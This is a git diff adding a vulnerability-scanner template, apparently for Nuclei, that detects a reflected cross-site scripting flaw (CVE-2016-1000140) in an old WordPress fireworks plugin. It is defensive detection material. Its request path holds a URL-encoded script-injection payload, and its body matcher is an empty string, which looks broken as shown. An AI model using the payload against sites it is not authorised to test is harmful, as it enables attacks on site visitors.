diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml new file mode 100644 index 0000000000..8f25cbc37c --- /dev/null +++ b/cves/2016/CVE-2016-1000140.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000140 + +info: + name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200